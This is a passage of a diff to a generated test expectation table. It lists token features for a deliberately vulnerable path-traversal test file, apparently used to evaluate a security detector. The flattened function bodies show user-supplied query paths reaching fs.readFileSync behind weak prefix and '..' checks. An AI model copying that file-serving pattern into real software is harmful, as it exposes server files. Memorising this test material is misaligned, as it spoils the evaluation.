app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:179:50:179:53 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:10 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:21 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:21 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:21 | path.startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:21 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:21 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:26 | exceptional return of path.startsWith('/') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:26 | exceptional return of path.startsWith('/') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:26 | exceptional return of path.startsWith('/') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:26 | exceptional return of path.startsWith('/') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:26 | exceptional return of path.startsWith('/') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:26 | path.startsWith('/') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:26 | path.startsWith('/') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:26 | path.startsWith('/') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:26 | path.startsWith('/') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:180:7:180:26 | path.startsWith('/') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:180:12:180:21 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:180:12:180:21 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:180:12:180:21 | startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:180:12:180:21 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:180:12:180:21 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:180:23:180:25 | '/' | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:180:23:180:25 | '/' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:180:23:180:25 | '/' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -8488,6 +74104,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:180:23:180:25 | '/' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:180:23:180:25 | '/' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:180:23:180:25 | '/' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:180:30:180:33 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:180:30:180:33 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:180:30:180:33 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:180:30:180:33 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:180:30:180:33 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:180:43:180:46 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:180:43:180:46 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:180:43:180:46 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:180:43:180:46 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:180:43:180:46 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:10 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:21 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:21 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:21 | path.startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:21 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:21 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:27 | exceptional return of path.st ... h('/x') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:27 | exceptional return of path.st ... h('/x') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:27 | exceptional return of path.st ... h('/x') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:27 | exceptional return of path.st ... h('/x') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:27 | exceptional return of path.st ... h('/x') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:27 | path.st ... h('/x') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:27 | path.st ... h('/x') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:27 | path.st ... h('/x') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:27 | path.st ... h('/x') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:181:7:181:27 | path.st ... h('/x') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:181:12:181:21 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:181:12:181:21 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:181:12:181:21 | startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:181:12:181:21 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:181:12:181:21 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:181:23:181:26 | '/x' | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:181:23:181:26 | '/x' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:181:23:181:26 | '/x' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -8496,6 +74147,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:181:23:181:26 | '/x' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:181:23:181:26 | '/x' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:181:23:181:26 | '/x' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:181:31:181:34 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:181:31:181:34 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:181:31:181:34 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:181:31:181:34 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:181:31:181:34 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:181:44:181:47 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:181:44:181:47 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:181:44:181:47 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:181:44:181:47 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:181:44:181:47 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:10 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:21 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:21 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:21 | path.startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:21 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:21 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:26 | exceptional return of path.startsWith('.') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:26 | exceptional return of path.startsWith('.') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:26 | exceptional return of path.startsWith('.') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:26 | exceptional return of path.startsWith('.') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:26 | exceptional return of path.startsWith('.') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:26 | path.startsWith('.') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:26 | path.startsWith('.') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:26 | path.startsWith('.') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:26 | path.startsWith('.') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:182:7:182:26 | path.startsWith('.') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:182:12:182:21 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:182:12:182:21 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:182:12:182:21 | startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:182:12:182:21 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:182:12:182:21 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:182:23:182:25 | '.' | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:182:23:182:25 | '.' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:182:23:182:25 | '.' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -8504,6 +74190,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:182:23:182:25 | '.' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:182:23:182:25 | '.' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:182:23:182:25 | '.' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:182:30:182:33 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:182:30:182:33 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:182:30:182:33 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:182:30:182:33 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:182:30:182:33 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:182:43:182:46 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:182:43:182:46 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:182:43:182:46 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:182:43:182:46 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:182:43:182:46 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:4 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:17 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:23 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs 